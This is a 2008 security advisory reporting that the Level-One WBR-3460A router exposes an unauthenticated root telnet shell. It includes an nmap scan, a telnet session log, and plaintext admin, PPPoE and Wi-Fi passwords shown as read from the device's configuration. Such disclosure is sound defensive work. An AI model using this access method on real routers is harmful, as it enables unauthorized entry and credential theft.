Advisory: Level-One WBR-3460A Grants Root Access
Risk: High
Vendor Status: Vendor has not released an updated version
Release Date: 08/01/2008
Last Modified: 01/01/2008
Author: Anastasios Monachos [anastasiosm(at)gmail(dot)com]
Level-One WBR-3460A latest firmware available 1.00.12
Level-One WBR-3460A firmware version 1.00.11
WBR-3460A comes with firmware version 1.00.06 installed, this happens to be the only
available version that is not affected by the vulnerability described below, however it
lacks of WPA2-PSK support and also of external/internal port mapping in Virtual servers
configuration page, amongst other things.
The Level-One WBR-3460A is an ADSL2/2+ Modem/Wireless Router which runs Linux BusyBox
v0.61.pre on a 32-bit RISC 4KEc V4.8 processor at 211 BogoMIPS, it incorporates 14 MB of
RAM and four 10/100 Ethernet ports.
Performing an nmap scan on the internal address I came up with the following:
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
Port 80 gives access through an HTML interface to the configuration menu as would be
expected, but although you can control access to that interface using a password, there
is no control over the telnet port. So, telnetting to port 23 (on is default IP
192.168.0.1) the users get automatically access to the filesystem, by providing no
credentials at all. Now the file system of the device may be used for malicious
communication and temporary data storage. Too, a user may download the upgrade firware's
HTML code from the www directory and modify it locally so allow other files than IMGs to
be uploaded and replace the existing firmware, making the device useless.
Also, one can view the contents of /etc/htpasswd file, where everything is in
plaintext, and retrieve the web-based administrator's (admin) password. Some of the
possible implications, that can be triggered from the web-interface, but not limited to
the following, are:
tasos@nyx:~$ telnet 192.168.0.1
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is '^]'.
BusyBox v0.61.pre (2007.03.16-05:39+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
bin dev etc lib proc sbin tmp usr var www
1 3 84 dma loadavg stat
107 3035 86 driver locks swaps
108 4 87 execdomains meminfo sys
110 43 89 filesystems misc sysvipc
111 4456 91 fs modules ticfg
112 5 92 interrupts mounts tty
1192 5233 avalanche iomem mtd uptime
124 5237 br_filter ioports net version
130 5239 br_trigger kcore partitions wlan
132 6 bus kmsg push_button
2 68 cmdline ksyms self
20 7 cpuinfo led slabinfo
246 80 devices led_mod special
admin:MySecretPassword
any data
IP806GAV3 time_zone=GMT+0 time_daylight= restore_default=0
(…removed for simplicity…)
dhcp_reserved= http_username=admin http_password=32spec904et28 http_timeout=5
(…removed for simplicity…)
[email protected] pppoe_password=xxxxxxxx
(…removed for simplicity…)
wifi_access_list=00:1B:72:23:00:51Tasos-Laptop 00:01:71:97:86:0BTasos-WDongle
(…removed for simplicity…)
wifi_present=1 wiz_runtest= ipoa_mode= wifi_psk_pwd=Js5xxkwD3fvtxxxxx645KdLxxxxxx
i. Please note that if the modem/router get power-cycled any file that had been
created earlier will be vanished
ii. All three versions of the firmware that were tested had no open ports visible from
the Internet
i. Level One WBR-3460A - http://global.level1.com/products2.php?Id=821
Copyright 2008 Anastasios Monachos [anastasiosm(at)gmail(dot)com]
The information in the advisory is believed to be accurate at the time
of publishing, based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information, and the author does
not accept any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.
Permission is granted for the redistribution of this alert, as long as
this Legal Notice remains intact.